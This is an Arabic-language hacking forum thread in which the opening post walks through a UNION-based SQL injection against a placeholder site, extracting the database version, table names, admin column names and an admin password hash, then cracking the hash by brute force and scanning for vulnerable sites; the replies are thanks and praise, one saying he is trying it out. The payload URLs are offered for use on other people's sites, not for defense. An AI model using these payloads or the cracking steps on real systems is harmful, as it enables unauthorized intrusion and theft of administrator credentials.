حالة الموضوع:
مغلق
  1. Ynoof

    Ynoof Developer

    الأنتساب:
    ‏2 ديسمبر 2011
    المشاركات:
    5
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    sql Injection
    الإقامة:
    My Home
    السلام عليكم ورحمه الله وبركاته

    كيفكم اخواني ان شاء الله بخير
    اليوم معانا شرح عن ثغرات sql injection الكل بيعرف يستغل هي الثغرة
    انا راح اضيف بعض اللمسات على الشرح للوصول الى الهدف بشكل سريع
    ورح اشرح كيف نبحث عن المواقع المصابه ببرنامج او موقع ... نتابع الشرح

    هات موقعك المخترق واستغل الثغره معانا

    كود PHP:
    http://www.sitename.com/main.php?id=232'
    نحط حرف طاء باللغه الانجليزي ' لمعرفه اذا كان الموقع مصاب او لا

    كود PHP:
    http://www.sitename.com/main.php?id=232 order by 1--
    order by تحديد عدد العواميد

    كود PHP:
    http://www.sitename.com/main.php?id=232 order by 1-- (no error) http://www.sitename.com/main.php?id=232 order by 2-- (no error) http://www.sitename.com/main.php?id=232 order by 3-- (no error) http://www.sitename.com/main.php?id=232 order by 4-- (no error) http://www.sitename.com/main.php?id=232 order by 5-- (ERROR!)
    اذن عدد العواميد 4 لانه في العمود رقم 5 طلع لنا خطا نرجع خطوة للخلف زال الخطا

    كود PHP:
    http://www.sitename.com/main.php?id=-232 union select 1,2,3,4--
    العامود المصاب رقم 3

    الان نريد معرفه اصدار قاعدة البيانات اذا كان الاصدار الرابع بيعتمد على التخمين وعلى حسب ذكائك
    اما اذا كان الاصدار الخامس فهو يعتمد على اظهار الجداول وملحقاتها

    كود PHP:
    http://www.sitename.com/main.php?id=-232 union select 1,2,@@version,4--
    طلع لنا الاصدار الخامس

    كود PHP:
    http://www.sitename.com/main.php?id=-232 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
    راح تطلع لنا جداول كثيرة من ضمنها جدول الادمن ..
    " admin"

    اذن نشفر الجدول من هذا الموقع

    http://www.waraxe.us/

    admin = 0x61646d696e

    اذن الاستغلال راح يكون بهذا الشكل

    كود PHP:
    http://www.sitename.com/main.php?id=-232 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x61646d696e--
    خليناة يخرج لنا العواميد الموجودة في جدول الادمن

    Admin_Username, Admin_Pass, Admin_credentials, User_credentials, Members

    نحتاج منهم Admin_Username, Admin_Pass

    اذن الشكل النهاي للاستغلال طلع لنا يوزر الادمن والباس

    كود PHP:
    http://www.sitename.com/main.php?id=-232 union select 1,2,group_concat(Admin_Username,0x3a,Admin_Pass),4 FROM
    admin : c1f6eb6f47b8fad0d1d3746bcd7167ed

    الباس مشفر في مليون طريقه لفك الباسورد
    والافضل طبعا قواعد الريمبو وتحميلها 25 جيجا )2:"
    ماقدرت احملها ..

    طيب في طريقه ثانيه عن طريق البروتو فورس تابع معي كيفيه قك الباسورد ببرنامج cain

    لتحميل البرنامج

    اظغط هنا

    نتابع الشرح بالصور


    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    تم فك التشفير

    طيب الان نستخرج المواقع المصابه عن طريق الفحص
    نتابع تحميل البرنامج + الشرح [ مرفق ]

    اظغط هنا

    من هنا ننهي موضوعنا باحلى سلام .. واتمنى الكل يسفتيد من الشرح ولو بالقليل
    يعطيكم العافيه .. في امان الله

     
  2. NaZy

    NaZy Developer

    الأنتساب:
    ‏4 ديسمبر 2011
    المشاركات:
    19
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    فـي سـسـتم!
    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    الله يعطيك العافية
    مبدع يآ عمي الشيخ *:"
    شوي شوي علينآ
    مآا نستحمل الابداع&:"
     
  3. moadd

    moadd Developer

    الأنتساب:
    ‏4 ديسمبر 2011
    المشاركات:
    20
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    الأردن
    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    يعطيك العافيه علا مجهودك الرائع
    وطرحك الراقي^:"
     
  4. K ! N G

    K ! N G V • I • P

    الأنتساب:
    ‏4 ديسمبر 2011
    المشاركات:
    59
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    شكرا أخي موضوع فالقمة merciii
     
  5. slam

    slam ExpErt DeveloPer

    الأنتساب:
    ‏14 سبتمبر 2011
    المشاركات:
    238
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    18
    الإقامة:
    MY HOME
    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    مشكور يالغالي جاري تقييمك !:"
     
  6. Raf-dz

    Raf-dz Developer

    الأنتساب:
    ‏6 ديسمبر 2011
    المشاركات:
    8
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    DZ
    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    يسلمو صآحب الموٍضوٍع
    ^:"
     
  7. NaZy

    NaZy Developer

    الأنتساب:
    ‏4 ديسمبر 2011
    المشاركات:
    19
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    فـي سـسـتم!
    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    الله يعطيك العافيه
    شرح رائع وسهل
    الله يوفقك
    )5:"
     
  8. MAX PWORE

    MAX PWORE DeveloPer Plus

    الأنتساب:
    ‏16 سبتمبر 2011
    المشاركات:
    79
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    مصر
    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    بآرك الله فيــك أخوي الغآلي
     
  9. SIR_DANGER

    SIR_DANGER Developer

    الأنتساب:
    ‏8 ديسمبر 2011
    المشاركات:
    11
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    egypt
    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    وعليكم السلام ورحمة الله

    تسلم يمينك يالغالي

    بانتظار المزيد
     
  10. الحربي

    الحربي DeveloPer Plus

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    72
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    Ӄ Ŵ Ť
    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    ابدعت يالغالي ( :
    الله يعطيك العافيه
    ولاتحرمنا من ابداعاتك
    وجاري التجربة
    ,,
    ^:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة